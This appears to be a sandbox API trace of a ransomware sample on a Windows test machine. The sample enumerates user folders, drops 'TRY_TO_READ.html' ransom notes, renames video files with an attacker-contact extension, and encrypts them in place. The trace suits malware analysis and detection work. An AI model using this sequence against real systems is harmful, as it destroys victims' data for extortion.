	[0100.135] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.135] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.136] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.136] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca7b2bb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7b2bb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da730
	[0100.136] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca7b2bb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7b2bb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.136] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f72b60, ftCreationTime.dwHighDateTime=0x1d4c924, ftLastAccessTime.dwLowDateTime=0x77d9cff0, ftLastAccessTime.dwHighDateTime=0x1d4ca98, ftLastWriteTime.dwLowDateTime=0x77d9cff0, ftLastWriteTime.dwHighDateTime=0x1d4ca98, nFileSizeHigh=0x0, nFileSizeLow=0xeb79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aWffYl9o4oJ8giwH3DI.avi", cAlternateFileName="AWFFYL~1.AVI")) returned 1
	[0100.136] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.136] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x265718f0, ftCreationTime.dwHighDateTime=0x1d4cac4, ftLastAccessTime.dwLowDateTime=0x2678b840, ftLastAccessTime.dwHighDateTime=0x1d4d1f7, ftLastWriteTime.dwLowDateTime=0x2678b840, ftLastWriteTime.dwHighDateTime=0x1d4d1f7, nFileSizeHigh=0x0, nFileSizeLow=0x1897a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="os_gujp6U1.flv", cAlternateFileName="OS_GUJ~1.FLV")) returned 1
	[0100.136] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f1d6f0, ftCreationTime.dwHighDateTime=0x1d4c900, ftLastAccessTime.dwLowDateTime=0xd6c9b5b0, ftLastAccessTime.dwHighDateTime=0x1d4cc15, ftLastWriteTime.dwLowDateTime=0xd6c9b5b0, ftLastWriteTime.dwHighDateTime=0x1d4cc15, nFileSizeHigh=0x0, nFileSizeLow=0x8b2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q-7Fe1_SnB9vB.mkv", cAlternateFileName="Q-7FE1~1.MKV")) returned 1
	[0100.136] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5701b1e0, ftCreationTime.dwHighDateTime=0x1d4ca6a, ftLastAccessTime.dwLowDateTime=0x757ba240, ftLastAccessTime.dwHighDateTime=0x1d4c9b4, ftLastWriteTime.dwLowDateTime=0x757ba240, ftLastWriteTime.dwHighDateTime=0x1d4c9b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QDILxLZczpyOolOj", cAlternateFileName="QDILXL~1")) returned 1
	[0100.136] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.138] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7b2bb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7b2bb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.138] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9bed040, ftCreationTime.dwHighDateTime=0x1d4d5a6, ftLastAccessTime.dwLowDateTime=0x99105490, ftLastAccessTime.dwHighDateTime=0x1d4ca6c, ftLastWriteTime.dwLowDateTime=0x99105490, ftLastWriteTime.dwHighDateTime=0x1d4ca6c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSKw", cAlternateFileName="")) returned 1
	[0100.138] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vskw\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.140] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x805a0dc0, ftCreationTime.dwHighDateTime=0x1d4cc37, ftLastAccessTime.dwLowDateTime=0x11b59e20, ftLastAccessTime.dwHighDateTime=0x1d4d2d1, ftLastWriteTime.dwLowDateTime=0x11b59e20, ftLastWriteTime.dwHighDateTime=0x1d4d2d1, nFileSizeHigh=0x0, nFileSizeLow=0x133f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XbjUXHONdJBlcg2J.avi", cAlternateFileName="XBJUXH~1.AVI")) returned 1
	[0100.140] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae76f0, ftCreationTime.dwHighDateTime=0x1d4d022, ftLastAccessTime.dwLowDateTime=0xab2d9950, ftLastAccessTime.dwHighDateTime=0x1d4ce43, ftLastWriteTime.dwLowDateTime=0xab2d9950, ftLastWriteTime.dwHighDateTime=0x1d4ce43, nFileSizeHigh=0x0, nFileSizeLow=0xb936, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XTd8hNYJ9DQW_PK.avi", cAlternateFileName="XTD8HN~1.AVI")) returned 1
	[0100.140] FindNextFileW (in: hFindFile=0x5da730, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae76f0, ftCreationTime.dwHighDateTime=0x1d4d022, ftLastAccessTime.dwLowDateTime=0xab2d9950, ftLastAccessTime.dwHighDateTime=0x1d4ce43, ftLastWriteTime.dwLowDateTime=0xab2d9950, ftLastWriteTime.dwHighDateTime=0x1d4ce43, nFileSizeHigh=0x0, nFileSizeLow=0xb936, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XTd8hNYJ9DQW_PK.avi", cAlternateFileName="XTD8HN~1.AVI")) returned 0
	[0100.140] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.140] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.140] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi", dwFileAttributes=0x80) returned 1
	[0100.140] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi") returned 57
	[0100.140] GetProcessHeap () returned 0x540000
	[0100.140] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x5919d0
	[0100.140] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi"
	[0100.141] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.141] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xtd8hnyj9dqw_pk.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xtd8hnyj9dqw_pk.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.143] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XTd8hNYJ9DQW_PK.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xtd8hnyj9dqw_pk.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.143] GetProcessHeap () returned 0x540000
	[0100.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.143] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=47414) returned 1
	[0100.143] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xb936
	[0100.143] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.143] GetProcessHeap () returned 0x540000
	[0100.143] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.143] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.143] WriteFile (in: hFile=0x4b8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.144] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.144] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.144] ReadFile (in: hFile=0x4b8, lpBuffer=0x605bb8, nNumberOfBytesToRead=0xb936, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x605bb8*, lpNumberOfBytesRead=0x3a1f778*=0xb936, lpOverlapped=0x0) returned 1
	[0100.145] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=-47414, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.145] WriteFile (in: hFile=0x4b8, lpBuffer=0x6114f8*, nNumberOfBytesToWrite=0xb936, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6114f8*, lpNumberOfBytesWritten=0x3a1f778*=0xb936, lpOverlapped=0x0) returned 1
	[0100.147] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.147] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.147] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi", dwFileAttributes=0x80) returned 1
	[0100.147] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi") returned 58
	[0100.147] GetProcessHeap () returned 0x540000
	[0100.147] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x601bd0
	[0100.147] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi"
	[0100.147] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.148] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xbjuxhondjblcg2j.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xbjuxhondjblcg2j.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.151] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XbjUXHONdJBlcg2J.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xbjuxhondjblcg2j.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.151] GetProcessHeap () returned 0x540000
	[0100.151] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.151] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=78837) returned 1
	[0100.151] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x133f5
	[0100.151] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.151] GetProcessHeap () returned 0x540000
	[0100.151] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.151] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.151] WriteFile (in: hFile=0x4b8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.152] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.152] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.153] ReadFile (in: hFile=0x4b8, lpBuffer=0x605bb8, nNumberOfBytesToRead=0x133f5, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x605bb8*, lpNumberOfBytesRead=0x3a1f778*=0x133f5, lpOverlapped=0x0) returned 1
	[0100.154] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.154] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.154] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv", dwFileAttributes=0x80) returned 1
	[0100.154] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv") returned 55
	[0100.154] GetProcessHeap () returned 0x540000
	[0100.154] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x5919d0
	[0100.154] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv"
	[0100.154] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.155] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\q-7fe1_snb9vb.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\q-7fe1_snb9vb.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.157] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\q-7Fe1_SnB9vB.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\q-7fe1_snb9vb.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.157] GetProcessHeap () returned 0x540000
	[0100.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.157] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=35629) returned 1
	[0100.157] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8b2d
	[0100.157] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.157] GetProcessHeap () returned 0x540000
	[0100.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.157] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.157] WriteFile (in: hFile=0x4b8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.158] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.158] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.158] ReadFile (in: hFile=0x4b8, lpBuffer=0x605bb8, nNumberOfBytesToRead=0x8b2d, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x605bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8b2d, lpOverlapped=0x0) returned 1
	[0100.158] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=-35629, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.158] WriteFile (in: hFile=0x4b8, lpBuffer=0x60e6f0*, nNumberOfBytesToWrite=0x8b2d, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60e6f0*, lpNumberOfBytesWritten=0x3a1f778*=0x8b2d, lpOverlapped=0x0) returned 1
	[0100.160] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.160] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.160] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv", dwFileAttributes=0x80) returned 1
	[0100.160] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv") returned 52
	[0100.160] GetProcessHeap () returned 0x540000
	[0100.160] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0100.160] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv"
